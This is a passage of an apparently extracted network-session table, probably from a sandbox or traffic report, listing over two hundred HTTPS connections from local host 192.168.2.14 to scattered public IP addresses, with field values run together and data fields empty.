                                              18194192.168.2.1456018139.65.183.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18195192.168.2.143702293.30.111.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18196192.168.2.14573025.171.196.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18197192.168.2.1455946211.226.122.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18198192.168.2.144773673.171.149.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18199192.168.2.1443904123.183.14.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18200192.168.2.144170024.17.195.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18201192.168.2.144265812.173.178.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18202192.168.2.1444516197.100.210.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18203192.168.2.1455586108.165.82.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18204192.168.2.1451208146.183.15.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18205192.168.2.1452910179.251.64.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18206192.168.2.1439758104.251.250.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18207192.168.2.1435066165.20.221.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18208192.168.2.145252024.131.41.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18209192.168.2.1439126188.235.52.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18210192.168.2.1436226104.223.8.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18211192.168.2.1460530165.241.190.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18212192.168.2.1451728190.66.219.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18213192.168.2.1444944124.107.65.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18214192.168.2.143561024.126.60.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18215192.168.2.1457442116.38.123.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18216192.168.2.1456186108.16.195.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18217192.168.2.1434852171.47.135.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18218192.168.2.1436392160.129.77.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18219192.168.2.1445124169.219.49.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18220192.168.2.143565039.6.246.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18221192.168.2.1436538111.153.70.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18222192.168.2.144147489.225.218.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18223192.168.2.145396660.111.42.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18224192.168.2.143649259.0.217.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18225192.168.2.1455872115.224.112.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18226192.168.2.1453868140.80.165.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18227192.168.2.1452656200.112.191.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18228192.168.2.1451448180.54.3.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18229192.168.2.1447136106.233.87.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18230192.168.2.145100499.253.7.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18231192.168.2.1442948165.234.152.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18232192.168.2.144377865.172.193.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18233192.168.2.1435000151.185.54.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18234192.168.2.1449996146.5.34.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18235192.168.2.144989647.67.125.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18236192.168.2.1458704173.67.157.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18237192.168.2.1451804193.112.156.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18238192.168.2.1450446101.160.218.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18239192.168.2.1449372145.26.27.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18240192.168.2.144657471.37.24.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18241192.168.2.143383875.7.89.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18242192.168.2.145355241.81.8.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18243192.168.2.145304687.208.57.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18244192.168.2.1453846108.36.25.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18245192.168.2.144702424.211.12.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18246192.168.2.1445532121.158.252.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18247192.168.2.1442364155.10.150.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18248192.168.2.1440378201.39.60.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18249192.168.2.144783499.163.136.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18250192.168.2.1443672116.20.220.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18251192.168.2.1456342217.214.45.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18252192.168.2.144555089.118.224.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18253192.168.2.1436610221.23.199.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18254192.168.2.144872097.25.116.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18255192.168.2.144163657.204.184.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18256192.168.2.1457708166.70.111.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18257192.168.2.143702059.104.66.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18258192.168.2.144479086.253.90.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18259192.168.2.144777888.23.228.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18260192.168.2.1448106221.240.78.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18261192.168.2.1446046165.173.146.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18262192.168.2.1460192219.63.161.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18263192.168.2.144255446.151.224.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18264192.168.2.1454662120.98.148.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18265192.168.2.144295289.65.34.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18266192.168.2.143693265.42.127.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18267192.168.2.144808858.69.175.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18268192.168.2.1441156181.7.174.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18269192.168.2.1439410136.39.59.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18270192.168.2.145257472.152.18.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18271192.168.2.143283658.158.132.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18272192.168.2.1449616183.219.26.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18273192.168.2.144506048.0.96.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18274192.168.2.1433898185.62.168.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18275192.168.2.144312634.105.199.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18276192.168.2.1444494113.172.42.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18277192.168.2.144363641.199.165.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18278192.168.2.1460146123.168.4.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18279192.168.2.1440160113.233.231.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18280192.168.2.144202236.34.81.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18281192.168.2.145332042.169.145.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18282192.168.2.1456356188.134.96.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18283192.168.2.1456084100.172.238.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18284192.168.2.1435050102.185.75.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18285192.168.2.1454634207.40.17.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18286192.168.2.1434734179.25.254.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18287192.168.2.1455786194.230.167.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18288192.168.2.143456849.87.210.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18289192.168.2.1451096160.152.58.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18290192.168.2.1442522195.205.47.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18291192.168.2.1460064121.224.111.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18292192.168.2.1449608184.25.198.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18293192.168.2.143589672.12.214.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18294192.168.2.1436276108.95.200.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18295192.168.2.143484496.108.96.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18296192.168.2.144853466.242.220.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18297192.168.2.143419695.120.238.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18298192.168.2.143913440.72.148.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18299192.168.2.1452246212.94.9.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18300192.168.2.1436048178.242.183.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18301192.168.2.1459604114.68.76.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18302192.168.2.1436326189.14.189.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18303192.168.2.144572464.35.114.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18304192.168.2.144984275.157.143.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18305192.168.2.1460272156.155.64.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18306192.168.2.1438680218.142.15.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18307192.168.2.1433338199.206.243.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18308192.168.2.1458862183.75.138.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18309192.168.2.145611882.103.120.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18310192.168.2.144726877.242.51.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18311192.168.2.145599840.114.78.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18312192.168.2.144856694.105.216.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18313192.168.2.1439606134.145.25.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18314192.168.2.143983847.178.223.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18315192.168.2.1435864108.27.198.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18316192.168.2.1442518216.96.103.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18317192.168.2.1433324114.185.168.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18318192.168.2.143922236.100.40.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18319192.168.2.143323049.101.27.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18320192.168.2.1459096212.82.170.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18321192.168.2.1441098221.151.97.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18322192.168.2.144545825.34.56.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18323192.168.2.1455130188.43.243.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18324192.168.2.1441358178.5.25.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18325192.168.2.143645842.166.164.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18326192.168.2.1436146153.77.49.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18327192.168.2.1457146159.55.239.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18328192.168.2.144693220.66.216.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18329192.168.2.1443186130.174.51.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18330192.168.2.1454710166.19.132.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18331192.168.2.1444686190.150.184.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18332192.168.2.1437706113.159.119.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18333192.168.2.1448552111.107.86.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18334192.168.2.1446184152.206.117.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18335192.168.2.1433348208.28.68.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18336192.168.2.143316280.230.167.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18337192.168.2.143499670.45.185.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18338192.168.2.1437548144.154.57.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18339192.168.2.145927482.50.230.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18340192.168.2.1450736122.162.224.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18341192.168.2.145498271.119.90.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18342192.168.2.1452856114.54.238.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18343192.168.2.1439740188.143.134.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18344192.168.2.1435108196.164.197.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18345192.168.2.1459184192.246.182.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18346192.168.2.145295081.242.94.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18347192.168.2.1454776211.71.143.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18348192.168.2.145269665.13.229.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18349192.168.2.143634413.112.100.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18350192.168.2.1460626113.223.197.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18351192.168.2.1456374223.45.136.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18352192.168.2.1456900206.111.117.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18353192.168.2.143580413.204.147.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18354192.168.2.145475817.206.104.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18355192.168.2.1459766133.115.174.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18356192.168.2.1443572125.16.190.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18357192.168.2.1440356122.87.78.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18358192.168.2.145466295.39.107.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18359192.168.2.144074470.23.247.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18360192.168.2.1458202125.95.69.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18361192.168.2.144629236.57.211.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18362192.168.2.1433714152.158.74.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18363192.168.2.145270418.58.225.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18364192.168.2.1452874223.104.255.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18365192.168.2.144400438.28.216.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18366192.168.2.145243659.0.194.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18367192.168.2.143358239.241.29.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18368192.168.2.1432810123.43.249.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18369192.168.2.1451946139.55.227.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18370192.168.2.1457492109.144.108.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18371192.168.2.1438706223.174.61.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18372192.168.2.145472874.80.219.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18373192.168.2.143953460.69.243.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18374192.168.2.1439178111.240.81.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18375192.168.2.144054640.38.17.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18376192.168.2.146031473.145.149.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18377192.168.2.144564018.12.6.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18378192.168.2.144480659.206.49.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18379192.168.2.1453212143.54.13.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18380192.168.2.1450006182.177.35.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18381192.168.2.1436560145.82.36.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18382192.168.2.1451092204.218.225.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18383192.168.2.143933682.143.216.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18384192.168.2.1437900133.126.96.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18385192.168.2.143748860.173.78.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18386192.168.2.144681842.236.36.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18387192.168.2.1444654112.85.250.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18388192.168.2.143343047.181.21.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18389192.168.2.1433228126.28.162.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18390192.168.2.14331541.111.4.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18391192.168.2.1458740121.153.113.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18392192.168.2.1450974137.161.229.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18393192.168.2.1436700218.244.113.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18394192.168.2.1441818187.141.168.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18395192.168.2.143462258.130.201.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18396192.168.2.144296499.182.101.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18397192.168.2.145201036.252.224.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18398192.168.2.143885293.214.196.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18399192.168.2.1442538151.146.67.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18400192.168.2.145594245.4.43.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18401192.168.2.1457022222.96.150.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18402192.168.2.143711470.208.14.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18403192.168.2.145308497.113.182.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18404192.168.2.1440276208.215.68.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18405192.168.2.144020090.97.195.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18406192.168.2.1457508207.17.202.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18407192.168.2.143300890.65.205.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18408192.168.2.1454782102.45.84.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18409192.168.2.143371636.226.193.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18410192.168.2.1441168138.243.143.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18411192.168.2.145780261.233.81.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18412192.168.2.143678682.240.161.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18413192.168.2.1437204139.84.119.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18414192.168.2.1433696151.142.197.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18415192.168.2.1440964187.206.140.121443
                                              TimestampBytes transferredDirectionData


